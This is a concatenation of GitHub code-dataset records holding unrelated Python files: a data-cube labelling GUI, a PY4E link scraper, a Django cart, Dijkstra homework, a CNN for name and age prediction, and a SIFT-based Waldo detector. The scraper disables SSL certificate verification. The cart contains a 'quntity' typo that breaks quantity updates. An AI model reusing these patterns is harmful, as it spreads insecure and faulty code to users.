concat_path)\r\n self.selection_listbox.config(width=18)\r\n cc=cc+1\r\n self._build_counter(cc)\r\n \r\n def __add_data_cube(self, sub_dir):\r\n contents = os.listdir(sub_dir)\r\n dc_path = [sub_dir + \"/\" + i for i in contents if \"before\" in i] # takes first data cube it finds\r\n if len(dc_path) > 0:\r\n dc_path = dc_path[0]\r\n if dc_path in self.data_cube_paths:\r\n messagebox.showerror(\"Error\", \"That data has already been added.\")\r\n else:\r\n self.data_cube_paths.append(dc_path)\r\n\r\n def __add_data_cube_subdirs(self):\r\n super_dir = self.__get_path_to_dir(\"Please select folder containing all the OP folders.\")\r\n sub_dirs = self.__get_sub_folder_paths(super_dir, True)\r\n for sub_dir in sub_dirs:\r\n if \"/hot/\" not in sub_dir or \"/not/\" not in sub_dir:\r\n if len(glob.glob(sub_dir + \"/*before*\"))>=1:\r\n self.__add_data_cube(sub_dir)\r\n self.__add_from_data_cube_paths()\r\n\r\n def __get_path_to_dir(self, title):\r\n path = filedialog.askdirectory(parent=self.root, title=title)\r\n return path\r\n\r\n @staticmethod\r\n def __get_sub_folder_paths(path_to_main_folder, recursive = False): \r\n sub_folders = sorted(glob.glob(path_to_main_folder+\"/**/\", recursive = recursive))\r\n return sub_folders\r\n \r\n def _insert_data_cube_paths(self):\r\n for dc_path in self.data_cube_paths:\r\n concat_path = os.path.basename(os.path.normpath(dc_path))\r\n self.selection_listbox.insert(END, concat_path)\r\n self.selection_listbox.config(width=18)\r\n self._build_counter(len(self.data_cube_paths))\r\n \r\n def __trash_list(self):\r\n self.data_cube_paths = []\r\n self.selection_listbox.delete(0,'end')\r\n self.coords_list = [(None, None) for _ in range(1000000)]\r\n self.__remove_pt('all')\r\n self._build_counter(len(self.data_cube_paths))\r\n \r\n # ------------------------------------ Selection Listbox (control) ----------------------------\r\n \r\n def __next_hot(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n copy_tree(os.path.dirname(dc_path), base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n \r\n def __next_not(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n def __next_one(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n \r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n shutil.copy(glob.glob(os.path.dirname(dc_path) + \"/*before*\")[0], base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n def __next_two(self, event = None):\r\n if len(self.selection_listbox.curselection())>0:\r\n sel = self.selection_listbox.curselection()[0]\r\n else:\r\n sel = self.current_dc_path\r\n dc_path = self.get_selected_data_cube_path()\r\n base_path = os.path.dirname(os.path.dirname(dc_path))\r\n if os.path.exists(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path))):\r\n shutil.rmtree(base_path + \"/hot/\" + os.path.basename(os.path.dirname(dc_path)))\r\n \r\n if not os.path.exists(base_path + \"/hot\"):\r\n os.mkdir(base_path + \"/hot\")\r\n if not os.path.exists(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path))):\r\n os.mkdir(base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n shutil.copy(glob.glob(os.path.dirname(dc_path) + \"/*after*\")[0], base_path + \"/hot/\" +os.path.basename(os.path.dirname(dc_path)))\r\n self.selection_listbox.selection_clear(0, END)\r\n self.selection_listbox.select_set(sel+1) #This only sets focus on the first item.\r\n self.selection_listbox.event_generate(\"<>\")\r\n \r\n # ------------------------------------------------- Saving / Loading --------------------------------------------------\r\n \r\n def __save_mask(self):\r\n polygon = [point for point in self.coords_list if point != (None, None)]\r\n if len(polygon)>0:\r\n img = Image.new('L', (640, 480), 0)\r\n ImageDraw.Draw(img).polygon(polygon, outline=1, fill=1)\r\n mask_array = np.array(img)\r\n path = os.path.dirname(self.get_selected_data_cube_path())\r\n if not os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n os.mkdir(path + '/'+self.listener.output_folder_hypergui)\r\n output_path = path + '/'+self.listener.output_folder_hypergui + \"/mask\" + '.csv'\r\n np.savetxt(output_path, mask_array, delimiter=\",\", fmt=\"%d\")\r\n else:\r\n pass\r\n \r\n def __save_points(self):\r\n data = self.__get_coords_list()\r\n if len(data)>0:\r\n path = os.path.dirname(self.get_selected_data_cube_path())\r\n if self.delete_content:\r\n if os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n shutil.rmtree(path + '/'+self.listener.output_folder_hypergui)\r\n if not os.path.exists(path + '/'+self.listener.output_folder_hypergui):\r\n os.mkdir(path + '/'+self.listener.output_folder_hypergui)\r\n output_path = path + '/'+self.listener.output_folder_hypergui + \"/MASK_COORDINATES\" + '.csv'\r\n np.savetxt(output_path, data, delimiter=\",\", fmt=\"%1.2f\")\r\n else:\r\n pass\r\n \r\n def __save_all(self):\r\n self.__save_coords(True)\r\n \r\n \r\n ","repo_name":"JanOdenthal/Rhinoplastic_Paper","sub_path":"RSTinder/HyperGuiModules/bp.py","file_name":"bp.py","file_ext":"py","file_size_in_byte":16746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"15403062839","text":"import urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter URL: ')\ncount = input('Enter count: ')\n#Turn into an integer, this is how many links it will give you\ncountx = int(count)\nposition = input('Enter position: ')\n#Turn into integer, this is the position it will begin on\npositionx = int(position)\n\nhtml = urllib.request.urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, 'html.parser')\nnames = list()\nticker = 0\n\n# Retrieve all of the anchor tags\ntags = soup('a')\n\n#As long as we haven't maxed out, keep the loop going\nwhile ticker != countx:\n\n #Run it again and reset\n html = urllib.request.urlopen(url, context=ctx).read()\n soup = BeautifulSoup(html, 'html.parser')\n tags = soup('a')\n #Track with: print(\"Cycle 1A\")\n\n #Start at the position and go x amount of times\n for tag in tags[(positionx - 1):]:\n\n print(\"Retrieving: \", tag.get('href', None))\n url = tag.get('href', None)\n ticker = ticker + 1\n # Track with: print(\"Cycle 1B\")\n break\n\n #names.append(stag)\n if ticker == countx:\n break\n\n #Uncommenting below would get you the exact names\n #for stag in tag:\n # ticker = ticker + 1\n # names.append(stag)\n # if ticker = countx:\n # break\n #print(stag)\n\n#print(tag[0:4])\n#print(names[positionx])\n","repo_name":"bradmdesign/PY4E-UoM","sub_path":"Course 3 - Using Python to Access Web Data/assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14585905334","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom shop.models import Product\n\n\nclass Cart(object):\n\n def __init__(self, request):\n \"\"\"\n Initialize the cart\n \"\"\"\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n # save an empty cart in the session\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart = cart\n\n def add(self, product, quantity=1, update_quantity=False):\n \"\"\"\n Add a product to the cart or update it's quantity\n \"\"\"\n product_id = str(product.id)\n if product_id not in self.cart:\n self.cart[product_id] = {'quantity': 0,\n 'price': str(product.price)}\n if update_quantity:\n self.cart[product_id]['quantity'] = quantity\n else:\n self.cart[product_id]['quntity'] += quantity\n self.save()\n\n def save(self):\n self.session.modified = True\n\n\n","repo_name":"akashgiricse/online-shop","sub_path":"myshop/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"29443017428","text":"# 2. Доработать алгоритм Дейкстры (рассматривался на уроке), чтобы он дополнительно возвращал список вершин,\r\n# которые необходимо обойти.\r\n\r\ng = [\r\n [0, 0, 1, 1, 9, 0, 0, 0],\r\n [0, 0, 9, 4, 0, 0, 5, 0],\r\n [0, 9, 0, 0, 3, 0, 6, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 1, 0],\r\n [0, 0, 0, 0, 0, 0, 5, 0],\r\n [0, 0, 7, 0, 8, 1, 0, 0],\r\n [0, 0, 0, 0, 0, 1, 2, 0],\r\n]\r\n\r\n\r\ndef dijkstra(graph, start):\r\n \"\"\"\r\n Функция на основе алгоритма Дейкстры, которая возвращает:\r\n - список кратчайших путей и их вес до всех остальных вершин\r\n - словарь вершин, через которые пройдет кратчайший путь\r\n \"\"\"\r\n length = len(graph)\r\n is_visited = [False] * length\r\n cost = [float('inf')] * length\r\n parent = [-1] * length\r\n way = {vertex: 'Нет пути' for vertex in range(length)}\r\n\r\n cost[start] = 0\r\n way[start] = 'Начальная вершина'\r\n min_cost = 0\r\n\r\n while min_cost < float('inf'):\r\n is_visited[start] = True\r\n\r\n for i, vertex in enumerate(graph[start]):\r\n if vertex != 0 and not is_visited[i]:\r\n\r\n if cost[i] > vertex + cost[start]:\r\n cost[i] = vertex + cost[start]\r\n parent[i] = start\r\n\r\n min_cost = float('inf')\r\n for i in range(length):\r\n if min_cost > cost[i] and not is_visited[i]:\r\n min_cost = cost[i]\r\n start = i\r\n\r\n for rev in range(length):\r\n if not parent[rev] == -1:\r\n way[rev] = [rev]\r\n while way[rev][-1] >= 0:\r\n way[rev].append(parent[way[rev][-1]])\r\n if way[rev][-1] == -1:\r\n way[rev].remove(-1)\r\n\r\n return cost, way\r\n\r\n\r\nif __name__ == '__main__':\r\n s = int(input('От какой вершины идти: '))\r\n cost_from, ways_from = dijkstra(g, s)\r\n\r\n print(f'Начальная вершина: {s}')\r\n for v, w in ways_from.items():\r\n if not w == 'Начальная вершина' and not w == 'Нет пути':\r\n print(f'Путь в вершину {v} из начальной: {\" -> \".join(map(str, w[::-1]))}. Вес пути {cost_from[v]}')\r\n elif w == 'Нет пути':\r\n print(f'Нет пути до вершины {v}')\r\n","repo_name":"MaximJoinedGit/Algorithms-and-data-structures-on-Python","sub_path":"lesson_8/homework_8.2.py","file_name":"homework_8.2.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7214584529","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Path:\n db = \"pup_pathways_test_db\"\n def __init__(self, data) -> None:\n self.id = data['id']\n self.coordinates = data['coordinates']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.user_id = data['user_id']\n\n @classmethod\n def create_path(cls, form_data):\n query=\"\"\"\n INSERT INTO path (user_id, coordinates)\n VALUES (%(user_id)s, %(coordinates)s)\n \"\"\"\n new_path_id = connectToMySQL(cls.db).query_db(query, form_data)\n print(new_path_id)\n return new_path_id\n\n @classmethod\n def show_all_paths(cls):\n query = \"\"\"\n SELECT *\n FROM path\n \"\"\"\n all_paths = connectToMySQL(cls.db).query_db(query)\n return all_paths\n","repo_name":"a-a-garcia/Pup_Pathways","sub_path":"flask_app/models/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72114591579","text":"import time\nimport psutil\nimport collections\nfrom loguru import logger\n\n\nData = collections.namedtuple('Data', ['time', 'value'])\n\n\ndef get_local_utilization():\n \"\"\"Get the CPU usage and memory usage\"\"\"\n cpu_usage = psutil.cpu_percent()\n memory_usage = psutil.virtual_memory().percent\n return cpu_usage, memory_usage\n\n\nclass SysInfo:\n \"\"\"Storing the system information of local and server\"\"\"\n def __init__(self):\n \n self.cpu_usage = []\n self.memory_usage = []\n self.local_delay = []\n self.offload_delay = []\n self.bandwidth = []\n self.local_pending_task = 0\n\n def update_local_utilization(self):\n \"\"\"Update local utilization including cpu usage and memory usage\"\"\"\n t = time.time()\n \n cpu_usage, memory_usage = get_local_utilization()\n self.cpu_usage.append(Data(t, cpu_usage))\n self.memory_usage.append(Data(t, memory_usage))\n\n def append_local_delay(self, cur_time, delay):\n \n data = Data(cur_time, delay)\n self.local_delay.append(data)\n\n def append_offload_delay(self, cur_time, delay):\n\n data = Data(cur_time, delay)\n self.offload_delay.append(data)\n\n def append_bandwidth(self, cur_time, delay):\n data = Data(cur_time, delay)\n self.bandwidth.append(data)\n\n\n\n\n\n","repo_name":"MSNLAB/SmartEye","sub_path":"local/sys_info.py","file_name":"sys_info.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"69"}
+{"seq_id":"15648296624","text":"#! python3\n# findToDeleteLargeFiles.py - goes through files on computer and finds largest files, adds them to list and returns list\n\n# This program will need to:\n# from home directory, walk through all files and add to a list if they are certain size. Return list\n\nimport os\nfrom pathlib import Path\np = Path.cwd()\nbigFiles = []\nfor file in os.listdir(str(p)):\n if os.path.getsize(file) > 1000:\n bigFiles.append(file)\n\nprint(bigFiles)\n","repo_name":"ktmurphy/WorkProjects","sub_path":"Coding/Ch 10/findToDeleteLargeFiles.py","file_name":"findToDeleteLargeFiles.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36575913013","text":"\"\"\"\r\nTitle: Name and age Prediction based on a person's Image using a Convolutional Neural Network\r\n\r\nAuthor: Moein Roghani\r\nEmail: roghanim@mcmaster.ca\r\n\r\nDescription: In this project, our goal is to create a model that can predict a person's name and their age, \r\nbased on their image using a Convolutional Neural Network (CNN) which we have implemented for each. \r\n\r\nDatasets used for training:\r\n- lfw: The data set contains more than 13,000 images of faces (5749 people) collected from the web\r\n http://vis-www.cs.umass.edu/lfw/}{http://vis-www.cs.umass.edu/lfw/\r\n- Names100: Contains 80,000 unconstrained human face images, including 100 popular names and 800 images per name\r\n https://exhibits.stanford.edu/data/catalog/tp945cq9122\r\n- IMDB-WIKI: 500k+ face images with age and gender labels\r\n https://data.vision.ee.ethz.ch/cvl/rrothe/imdb-wiki/\r\n\"\"\"\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Data Processing\r\n\r\n# The dataset is organized into multiple folders, with each folder representing a label (name or age),//\r\n# //and the images inside each folder corresponding to the data points for that name. So basically our training set is images that are each inside// \r\n# //their labelled classification folder.\r\n\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\ndata_directory = 'path_to_dataset_directory'\r\n\r\n\r\n#loading data from the directory and making our X_train set which is the data points, and Y_train which is their label.\r\ndef load_data(data_directory):\r\n X_train = [] \r\n Y_train = []\r\n data = []\r\n class_labels_dic = {}\r\n \r\n for value, label in enumerate(os.listdir(data_directory)):\r\n #assign an integer value for each class\r\n class_labels_dic[label] = value\r\n \r\n #add the data with its label\r\n class_folder = os.path.join(data_directory, label)\r\n for image in os.listdir(class_folder):\r\n X_train.append(os.path.join(class_folder, image))\r\n Y_train.append(value)\r\n data.append((os.path.join(class_folder, image), value))\r\n \r\n return data, class_labels_dic, np.array(X_train), np.array(Y_train)\r\n\r\ndata, class_labels_dic, X_train, Y_train = load_data(data_directory)\r\n\r\n\r\n#preprocessing the image by converting it to an array representing the image\r\ndef preprocess_image(image, size = (224, 224)):\r\n \r\n #resize the image to a specific dimension and convert it to an RGB channel\r\n image = Image.open(image).convert('RGB')\r\n image = image.resize(size)\r\n \r\n #convert image to an array of pixel values (RGB value of every pixel)\r\n #it is a matrix of size 224*224, where each item is an array of size 3 (RGB)\r\n image_array = np.array(image) / 255.0\r\n \r\n return image_array\r\n\r\n\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Convolutional Neural Network (CNN) Architecture\r\n\r\n# Some notes on CNN:\r\n# We use a Dropout layer to prevent overfitting\r\n# ReLU activation is basically f(x) = max(0, x)\r\n# Softmax activation is a smooth approximation to the max function, making it differentiable for second derivates as well in the case of using Newton's//\r\n# //method by second Taylor series approximation \r\n# We need a fully-connected layer between the Convolutional outputs and the final layer to be able to make predictions based on all the labels\r\n# We use Categorical Cross Entropy as a loss function for multi-class classification \r\n# We use Mean Squared Error (MSE) as a loss function for regression\r\n\r\nimport tensorflow as tf\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\r\nfrom tensorflow.keras.layers import BatchNormalization\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\n#mini-batch gradient descent method for faster updates when we have large datasets\r\ndef data_batch(data, batch_size=32, num_classes=None):\r\n while True:\r\n np.random.shuffle(data)\r\n for i in range(0, len(data), batch_size):\r\n batch_data = data[i:i+batch_size]\r\n X_batch = np.array([preprocess_image(img_path) for img_path, _ in batch_data], dtype=np.float32)\r\n y_batch = np.array([label for _, label in batch_data])\r\n y_batch = tf.keras.utils.to_categorical(y_batch, num_classes=num_classes)\r\n yield X_batch, y_batch\r\n\r\n\r\n#CNN Architecture for Name Prediction using Multi-Class Classification\r\ndef name_CNN_Model(input_shape, num_classes):\r\n model = Sequential([\r\n Conv2D(32, (3, 3), activation='relu', input_shape=input_shape), #convolutional layer\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Conv2D(64, (3, 3), activation='relu'),\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Conv2D(128, (3, 3), activation='relu'),\r\n BatchNormalization(),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n \r\n Flatten(),\r\n Dense(128, activation='relu'), #first fully connected layers\r\n Dropout(0.5), #for regularization\r\n \r\n #fully connected layers (Number of neurons should equal to the number of classes)\r\n Dense(num_classes, activation='softmax') \r\n ])\r\n\r\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n return model\r\n\r\n\r\n#CNN Architecture for Age Prediction using Regression (Age is a continuous valued variable)\r\ndef age_CNN_Model(input_shape, num_classes):\r\n model = Sequential([\r\n Conv2D(32, (3, 3), activation='relu', input_shape=input_shape), #Convolutional Layer\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n Dropout(0.25),\r\n\r\n Conv2D(64, (3, 3), activation='relu'),\r\n MaxPooling2D((2, 2)), #decrease the number of parameters\r\n Dropout(0.25),\r\n\r\n Flatten(),\r\n Dense(128, activation='relu'), #first fully connected layers\r\n Dropout(0.5), #for regularization\r\n \r\n #fully connected layers (Number of neurons should equal to the number of classes)\r\n Dense(num_classes, activation='linear')\r\n ])\r\n \r\n model.compile(optimizer='adam', loss='mean_squared_error')\r\n\r\n return model\r\n\r\n\r\n\r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n# Model Training \r\n# -----------------------------------------------------------------------------------------------------------------------------\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain_data, val_data = train_test_split(data, test_size=0.2, random_state=42)\r\n\r\n\r\n#it is a matrix of size 224*224, where each item is an array of size 3 (RGB)\r\ninput_shape = (224, 224, 3)\r\nnum_classes = len(class_labels_dic.values())\r\n\r\n#need more testing for finding a better epoch\r\n#the values are taken from a similar model\r\nbatch_size = 32\r\nepochs = 20\r\n\r\n#create our model and our batch for training and testing sets\r\ntrain_data_gen = data_batch(train_data, batch_size, num_classes)\r\nval_data_generator = data_batch(val_data, batch_size, num_classes)\r\n\r\n\r\n#fit model on training data for age prediction\r\nmodel = age_CNN_Model(input_shape, num_classes)\r\nhistory = model.fit(\r\n train_data_gen,\r\n steps_per_epoch=len(train_data) // batch_size,\r\n validation_data=val_data_generator,\r\n validation_steps=len(val_data) // batch_size,\r\n epochs=epochs\r\n)\r\n\r\n\r\n#fit model on training data for name prediction\r\nmodel = name_CNN_Model(input_shape, num_classes)\r\nhistory = model.fit(\r\n train_data_gen,\r\n steps_per_epoch=len(train_data) // batch_size,\r\n epochs=epochs\r\n)","repo_name":"MoeinRoghani/CNN-Name-and-Age-Identification","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16292866475","text":"from tkinter import *\n\nif __name__ == '__main__':\n root = Tk()\n canvas = Canvas(root, bg=\"#ffa827\", height=512, width=512)\n coordinates = 50, 100, 150, 200\n\n arc = canvas.create_arc(coordinates, start=0, extent=45, fill=\"#8d1832\")\n canvas.pack()\n\n root.mainloop()\n","repo_name":"mertturkmenoglu/python-examples","sub_path":"examples/gui/E008_Canvas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3204604167","text":"import pickle\nimport numpy as np\nimport cyvlfeat as vlfeat\nfrom scipy.spatial.distance import cdist\nimport cv2\nfrom os.path import join\nimport matplotlib.image as mpimg\n\n\ndef build_vocab(images, vocab_size):\n dim = 128 # length of the SIFT descriptors that you are going to compute.\n vocab = np.zeros((vocab_size, dim))\n total_SIFT_features = np.zeros((20 * len(images), dim))\n\n for i, img in enumerate(images):\n frames, descriptors = vlfeat.sift.dsift(img, step=1, fast=True)\n if descriptors.shape[0] > 20:\n idx = np.random.choice(descriptors.shape[0], size=20, replace=False)\n elif descriptors.shape[0] > 0:\n idx = np.random.choice(descriptors.shape[0], size=20, replace=True)\n else:\n continue\n total_SIFT_features[i * 20:(i + 1) * 20] = descriptors[idx, :]\n vocab = vlfeat.kmeans.kmeans(total_SIFT_features, vocab_size)\n\n return vocab\n\n\ndef bags_of_sifts(images, vocab_filename):\n with open(vocab_filename, 'rb') as f:\n vocab = pickle.load(f)\n\n feats = np.zeros(shape=(len(images), vocab.shape[0]))\n for idx, img in enumerate(images):\n frames, descriptors = vlfeat.sift.dsift(img, step=20, fast=True)\n D = cdist(descriptors, vocab)\n feature = [0] * vocab.shape[0]\n for d in D:\n feature[np.argmin(d)] += 1\n feature = np.asarray(feature)\n if np.linalg.norm(feature) != 0:\n feature = feature / np.linalg.norm(feature)\n feats[idx] = feature\n\n return feats\n\n\ndef bags_of_sifts_spm(imgs, vocab_filename, depth):\n with open(vocab_filename, 'rb') as f:\n vocab = pickle.load(f)\n\n vocab_size = vocab.shape[0]\n feats = []\n\n # compute the total num of cells in all levels\n num_cell = 0\n for level in range(depth):\n num_cell += 4 ** level\n feats = np.zeros(shape=(len(imgs), vocab_size * num_cell))\n\n for idx, img in enumerate(imgs):\n\n this_feature = []\n for level in range(depth):\n cell_per_line = 2 ** level\n width, height, weight = getLevelInfo(img, level, depth)\n # print('level: {0} height: {1} width: {2}'.format(level, width, height))\n\n for index in range(cell_per_line ** 2):\n min_x = (index // cell_per_line) * width\n max_x = (index // cell_per_line + 1) * width\n min_y = (index % cell_per_line) * height\n max_y = (index % cell_per_line + 1) * height\n\n patch = img[min_x:max_x, min_y:max_y]\n frames, descriptors = vlfeat.sift.dsift(patch, step=8, fast=True)\n D = cdist(descriptors, vocab)\n feature = np.zeros(shape=(vocab.shape[0]))\n for d in D:\n feature[np.argmin(d)] += 1\n for f in feature:\n this_feature.append(f * weight)\n\n this_feature = np.asarray(this_feature).flatten()\n if np.linalg.norm(this_feature) != 0:\n feats[idx] = this_feature / np.linalg.norm(this_feature)\n\n return feats\n\n\ndef getLevelInfo(img, level, depth):\n width = img.shape[0]\n height = img.shape[1]\n weight = 1 / 2 ** (depth - 1)\n if level != 0:\n width = int(width / (2 * level))\n height = int(height / (2 * level))\n weight = 1 / 2 ** (depth - level)\n\n return width, height, weight\n\n\ndef filter_candidate_sift(image_id, candidates_pos, model, threshold, vocab_filename):\n filtered_candidates_pos = []\n\n img = mpimg.imread(join(\"datasets/JPEGImages/{}.jpg\".format(image_id)))\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n for pos in candidates_pos:\n (x, y, w, h) = pos\n x = int(round(x))\n y = int(round(y))\n w = int(round(w))\n h = int(round(h))\n candidate = img[y:y + h, x:x + w]\n\n if any(i < 8 for i in [x, y, w, h]):\n continue\n candidate_feats = bags_of_sifts_spm([candidate], vocab_filename, 3)\n pred = model.predict_proba(candidate_feats)[0]\n if pred[0] >= threshold:\n info = [image_id, pred[0]]\n info.extend([x, y, x+w, y+h])\n filtered_candidates_pos.append(info)\n\n return filtered_candidates_pos\n\n\ndef get_res(candidates, candidates_pos, model, vocab_filename=None):\n waldo_list = []\n wenda_list = []\n wizard_list = []\n\n waldo_candidates = []\n wenda_candidates = []\n wizard_candidates = []\n\n import math\n index = 0\n for candidate, pos in zip(candidates, candidates_pos):\n val_image_feat = bags_of_sifts_spm([candidate], vocab_filename, 3)\n y_pred = model.predict(val_image_feat)[0]\n if y_pred == 'waldo':\n waldo_list.append(pos)\n waldo_candidates.append(candidate)\n if y_pred == 'wenda':\n wenda_list.append(pos)\n wenda_candidates.append(candidate)\n if y_pred == 'wizard':\n wizard_list.append(pos)\n wizard_candidates.append(candidate)\n index += 1\n if index % 1000 == 0:\n print(\"res {0}\".format(index))\n return waldo_candidates, waldo_list, wenda_candidates, wenda_list, wizard_candidates, wizard_list\n\n","repo_name":"YShu7/WhereIsWaldo","sub_path":"sift_utils.py","file_name":"sift_utils.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11356019639","text":"\"\"\"\nEjercicio 3: Calculadora de envío\n\nUn minorista en línea proporciona una forma de envío urgente de $ 10.95 para el primer elemento y $ 2.95 para cada segundo elemento posterior. \nEscriba una función que tome el número de elementos en el pedido como su único parámetro. Devuelva los gastos de envío del pedido como resultado de la función. \nIncluya un programa principal que lea la cantidad de artículos comprados al usuario y muestre los gastos de envío.\n\n\"\"\"\ndef calculadora_de_envios(cantidad_articulos):\n\tp1 = 10.95\n\tp2 = 2.95\n\tgastos_envio = p1 + p2 * (cantidad_articulos - 1)\n\treturn gastos_envio \n\n\nprint(\"Bienvendos a mi programa!!\")\n\ncantidad = int(input(\"Ingrese la cantidad de artículos que desea ser enviado\\t\"))\n\nprint(f\"El precio por el envío inmediato es de ${calculadora_de_envios(cantidad)}\")","repo_name":"renzocastro91/Python-Informatorio2022","sub_path":"Funciones/Ej3.py","file_name":"Ej3.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
